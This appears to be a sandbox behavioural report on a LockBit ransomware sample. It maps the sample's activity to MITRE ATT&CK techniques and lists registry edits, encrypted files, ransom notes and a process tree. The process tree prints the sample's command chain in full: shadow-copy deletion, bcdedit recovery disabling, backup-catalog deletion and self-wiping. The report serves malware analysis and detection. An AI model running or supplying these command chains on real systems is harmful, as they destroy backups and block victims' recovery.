lockbit | c5741701b3866459dd1ffa2477cfd8776713612912693a5897f78aac795d23e9

pid	Process
2564	bcdedit.exe
4384	bcdedit.exe

Renames multiple (6392) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

T1070.004

Inhibit System Recovery

pid	Process
2660	wbadmin.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation	LockBit_14_02_2021_146KB.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RansomwareSamples\\LockBit_14_02_2021_146KB.exe\""	LockBit_14_02_2021_146KB.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\Users\\Admin\\Desktop\\LockBit-note.hta"	LockBit_14_02_2021_146KB.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\F:	LockBit_14_02_2021_146KB.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7A4C.tmp.bmp"	LockBit_14_02_2021_146KB.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

pid	Process
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_OEM_Perp-ul-oob.xrm-ms	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\COPYING.txt	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxSignature.p7x	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\ExchangeMediumTile.scale-150.png	LockBit_14_02_2021_146KB.exe
File created	C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\Restore-My-Files.txt	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStoreTasksWrapper.winmd	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\LargeTile.scale-100.png	LockBit_14_02_2021_146KB.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\uk-ua\Restore-My-Files.txt	LockBit_14_02_2021_146KB.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\Restore-My-Files.txt	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\eu-es\ui-strings.js	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\s_agreement_filetype.svg	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\root\ui-strings.js	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Square44x44Logo.targetsize-96_altform-unplated.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\manifests\BuiltinAddCustomTags.xml	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Transit\contrast-white\MedTile.scale-100.png	LockBit_14_02_2021_146KB.exe
File created	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_neutral_~_8wekyb3d8bbwe\Restore-My-Files.txt	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\GenericMailWideTile.scale-100.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\TimerMedTile.contrast-white_scale-200.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-96_altform-unplated.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\sat_logo.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\AppxManifest.xml	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hr-hr\ui-strings.js	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\uk-ua\ui-strings.js	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN044.XML	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\Assets\Images\LockScreenBadgeLogo.scale-100.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\WideTile.scale-125.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\ShouldNotThrow.snippets.ps1xml	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL026.XML	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MediumTile.scale-125_contrast-white.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\packages.config	LockBit_14_02_2021_146KB.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-il\Restore-My-Files.txt	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\office.core.operational.js	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchWide310x150Logo.scale-200_contrast-black.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Services.Store.Engagement_10.0.18101.0_x86__8wekyb3d8bbwe\Microsoft.Services.Store.Engagement.winmd	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\MoveToFolderToastQuickAction.scale-80.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-64_altform-unplated_contrast-white.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_TeethSmile.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\Icons\jit_rich_capture.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_12.50.6001.0_x64__8wekyb3d8bbwe\AppxSignature.p7x	LockBit_14_02_2021_146KB.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ru-ru\Restore-My-Files.txt	LockBit_14_02_2021_146KB.exe
File created	C:\Program Files\Microsoft Office\root\Document Themes 16\Restore-My-Files.txt	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp-pl.xrm-ms	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\bg3_thumb.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\combinepdf-tool-view.js	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-black_scale-140.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\mscss7wre_es.dub	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Microsoft.Notes.Upgrade.winmd	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxAccountsSplashLogo.scale-100.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-16_altform-unplated_contrast-black.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNotePageLargeTile.scale-125.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\S_ThumbDownOutline_22_N.svg	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.scale-140.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-125_kzf8qxf38zg5c\Assets\Images\SkypeAppList.scale-125_contrast-black.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\resources\strings\LocalizedStrings_et.json	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SplashScreen.scale-125_contrast-white.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\eml.scale-32.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-16_altform-lightunplated.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\dot_2x.png	LockBit_14_02_2021_146KB.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hu-hu\Restore-My-Files.txt	LockBit_14_02_2021_146KB.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
5492	3640	WerFault.exe	121

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	LockBit_14_02_2021_146KB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fsutil.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3420	cmd.exe
1568	PING.EXE

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

Direct Volume Access

T1006

pid	Process
4828	vssadmin.exe

Modifies Control Panel 2 IoCs

defense_evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Desktop\TileWallpaper = "0"	LockBit_14_02_2021_146KB.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\Desktop\WallpaperStyle = "2"	LockBit_14_02_2021_146KB.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000_Classes\Local Settings	LockBit_14_02_2021_146KB.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1568	PING.EXE

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe
5276	LockBit_14_02_2021_146KB.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	5276	LockBit_14_02_2021_146KB.exe
Token: SeDebugPrivilege	5276	LockBit_14_02_2021_146KB.exe
Token: SeBackupPrivilege	4564	vssvc.exe
Token: SeRestorePrivilege	4564	vssvc.exe
Token: SeAuditPrivilege	4564	vssvc.exe
Token: SeIncreaseQuotaPrivilege	4696	WMIC.exe
Token: SeSecurityPrivilege	4696	WMIC.exe
Token: SeTakeOwnershipPrivilege	4696	WMIC.exe
Token: SeLoadDriverPrivilege	4696	WMIC.exe
Token: SeSystemProfilePrivilege	4696	WMIC.exe
Token: SeSystemtimePrivilege	4696	WMIC.exe
Token: SeProfSingleProcessPrivilege	4696	WMIC.exe
Token: SeIncBasePriorityPrivilege	4696	WMIC.exe
Token: SeCreatePagefilePrivilege	4696	WMIC.exe
Token: SeBackupPrivilege	4696	WMIC.exe
Token: SeRestorePrivilege	4696	WMIC.exe
Token: SeShutdownPrivilege	4696	WMIC.exe
Token: SeDebugPrivilege	4696	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4696	WMIC.exe
Token: SeRemoteShutdownPrivilege	4696	WMIC.exe
Token: SeUndockPrivilege	4696	WMIC.exe
Token: SeManageVolumePrivilege	4696	WMIC.exe
Token: 33	4696	WMIC.exe
Token: 34	4696	WMIC.exe
Token: 35	4696	WMIC.exe
Token: 36	4696	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4696	WMIC.exe
Token: SeSecurityPrivilege	4696	WMIC.exe
Token: SeTakeOwnershipPrivilege	4696	WMIC.exe
Token: SeLoadDriverPrivilege	4696	WMIC.exe
Token: SeSystemProfilePrivilege	4696	WMIC.exe
Token: SeSystemtimePrivilege	4696	WMIC.exe
Token: SeProfSingleProcessPrivilege	4696	WMIC.exe
Token: SeIncBasePriorityPrivilege	4696	WMIC.exe
Token: SeCreatePagefilePrivilege	4696	WMIC.exe
Token: SeBackupPrivilege	4696	WMIC.exe
Token: SeRestorePrivilege	4696	WMIC.exe
Token: SeShutdownPrivilege	4696	WMIC.exe
Token: SeDebugPrivilege	4696	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4696	WMIC.exe
Token: SeRemoteShutdownPrivilege	4696	WMIC.exe
Token: SeUndockPrivilege	4696	WMIC.exe
Token: SeManageVolumePrivilege	4696	WMIC.exe
Token: 33	4696	WMIC.exe
Token: 34	4696	WMIC.exe
Token: 35	4696	WMIC.exe
Token: 36	4696	WMIC.exe
Token: SeBackupPrivilege	3108	wbengine.exe
Token: SeRestorePrivilege	3108	wbengine.exe
Token: SeSecurityPrivilege	3108	wbengine.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 5276 wrote to memory of 4392	5276	LockBit_14_02_2021_146KB.exe	90
PID 5276 wrote to memory of 4392	5276	LockBit_14_02_2021_146KB.exe	90
PID 4392 wrote to memory of 4828	4392	cmd.exe	92
PID 4392 wrote to memory of 4828	4392	cmd.exe	92
PID 4392 wrote to memory of 4696	4392	cmd.exe	96
PID 4392 wrote to memory of 4696	4392	cmd.exe	96
PID 4392 wrote to memory of 2564	4392	cmd.exe	98
PID 4392 wrote to memory of 2564	4392	cmd.exe	98
PID 4392 wrote to memory of 4384	4392	cmd.exe	99
PID 4392 wrote to memory of 4384	4392	cmd.exe	99
PID 4392 wrote to memory of 2660	4392	cmd.exe	100
PID 4392 wrote to memory of 2660	4392	cmd.exe	100
PID 5276 wrote to memory of 3640	5276	LockBit_14_02_2021_146KB.exe	121
PID 5276 wrote to memory of 3640	5276	LockBit_14_02_2021_146KB.exe	121
PID 5276 wrote to memory of 3640	5276	LockBit_14_02_2021_146KB.exe	121
PID 5276 wrote to memory of 3420	5276	LockBit_14_02_2021_146KB.exe	122
PID 5276 wrote to memory of 3420	5276	LockBit_14_02_2021_146KB.exe	122
PID 5276 wrote to memory of 3420	5276	LockBit_14_02_2021_146KB.exe	122
PID 3420 wrote to memory of 1568	3420	cmd.exe	124
PID 3420 wrote to memory of 1568	3420	cmd.exe	124
PID 3420 wrote to memory of 1568	3420	cmd.exe	124
PID 3420 wrote to memory of 2168	3420	cmd.exe	129
PID 3420 wrote to memory of 2168	3420	cmd.exe	129
PID 3420 wrote to memory of 2168	3420	cmd.exe	129

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5276
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4392
- - C:\Windows\system32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:4828
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4696
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:2564
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled no
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:4384
- - C:\Windows\system32\wbadmin.exe
    wbadmin delete catalog -quiet
    3⤵
    - Deletes backup catalog
    PID:2660
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\LockBit-note.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3640
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3640 -s 1792
    3⤵
    - Program crash
    PID:5492
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe" & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:3420
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1568
- - C:\Windows\SysWOW64\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2168

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4564

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3108

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:3484

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:3068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3640 -ip 3640
1⤵
PID:2036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery